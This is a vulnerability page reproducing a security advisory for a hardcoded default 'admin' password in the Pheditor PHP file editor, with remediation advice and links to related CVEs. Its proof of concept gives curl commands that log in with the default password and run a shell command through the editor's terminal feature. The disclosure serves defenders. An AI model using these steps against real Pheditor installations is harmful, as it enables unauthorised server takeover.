PHP
CVE-2026-55579
CRITICAL
Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
Pheditor ships with a hardcoded default password admin (SHA-512 hash stored at pheditor.php:11). There is no mechanism to force a password change on first login. Any deployment using the default credentials grants an attacker full access to the file editor, file upload, and terminal features, enabling arbitrary file read/write and remote code execution.
Details
Tested repository: https://github.com/pheditor/pheditor
Tested commit: e538f05b6faec99e5b23726bc9c17d6b57774297 (current HEAD on main)
Affected version: All versions of Pheditor
The password is hardcoded at pheditor.php:11:
define('PASSWORD', 'c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec');This is the SHA-512 hash of the string admin:
echo -n 'admin' | sha512sum
c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ecThe application displays a warning banner at pheditor.php:1956-1958 when the default password is in use, but this is only visual - there is no forced password change, no expiry, no lockout, and no setup wizard. Many deployments run with the default indefinitely.
The password hash is stored as unsalted SHA-512 in the source code. The password change feature (lines 363-391) writes the new hash directly into the PHP source file, meaning anyone with read access to the source can extract it.
Combined impact: With the default password, an unauthenticated attacker can authenticate and exploit the terminal RCE and file upload vulnerabilities for immediate server compromise.
PoC
Environment: Any system running Pheditor with default configuration.
Setup:
git clone https://github.com/pheditor/pheditor /tmp/pheditor-test
cd /tmp/pheditor-test
php -S localhost:8080 pheditor.php &Positive trigger - authenticate with default password:
curl -s -c /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \
-d "pheditor_password=admin" -L -o /dev/null -w "%{http_code}"Expected: 200 - successful authentication with the default password admin.
Verify full access:
TOKEN=$(curl -s -b /tmp/cookies.txt http://localhost:8080/pheditor.php | \
grep -o 'token = "[a-f0-9]*"' | grep -o '"[a-f0-9]*"' | tr -d '"')
curl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \
--data-urlencode "action=terminal" \
--data-urlencode "token=$TOKEN" \
--data-urlencode 'command=echo `id`' \
--data-urlencode "dir="Expected: id output showing web server user - proves full system access through default credentials combined with terminal RCE.
Control (wrong password):
curl -s -X POST http://localhost:8080/pheditor.php \
-d "pheditor_password=wrongpassword" | grep -o 'not correct'Expected: not correct - authentication logic works but default password is trivially guessable.
Cleanup:
kill %1; rm -rf /tmp/pheditor-test /tmp/cookies.txtImpact
Use of Hard-coded Credentials (CWE-798). The default password admin is publicly documented in the source code, trivially guessable, and there is no mechanism to force a password change on first login. This effectively grants unauthenticated remote attackers full administrator access to the application.
Attacker privileges: Unauthenticated remote attacker (PR:N).
Security boundary crossed: Unauthenticated → fully authenticated administrator.
Confidentiality impact: High - read all files within MAIN_DIR and beyond (via terminal).
Integrity impact: High - write/delete files, upload webshells, modify application code, execute arbitrary commands.
Availability impact: High - delete files and directories, disrupt services.
Suggested remediation:
- Remove the default password - require user to set a password during installation.
- Add a setup wizard that forces password creation on first access.
- Add a forced password change on first login with default credentials.
- Use
password_hash()/password_verify()withPASSWORD_BCRYPTinstead of raw SHA-512.
Credits
- Thai Son Dinh from VinSOC Labs (R&D)
AnalysisAI
Hardcoded default administrator password in Pheditor (all versions prior to 2.0.6) lets remote unauthenticated attackers log in as admin using the string 'admin' — the SHA-512 hash of which is baked into pheditor.php line 11 — and then abuse the built-in terminal and file-upload features for immediate remote code execution. Any deployment left on defaults is trivially compromised because there is no forced password change, expiry, lockout, or setup wizard. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Recommended ActionAI
Within 24 hours, urgently identify all Pheditor installations and their versions (publicly available exploit code exists); confirm which systems are internet-facing or network-accessible. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C
Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c
Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1
NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro
The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all
Same weakness CWE-798 – Use of Hard-coded Credentials
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-p4h7-p9rj-2pq2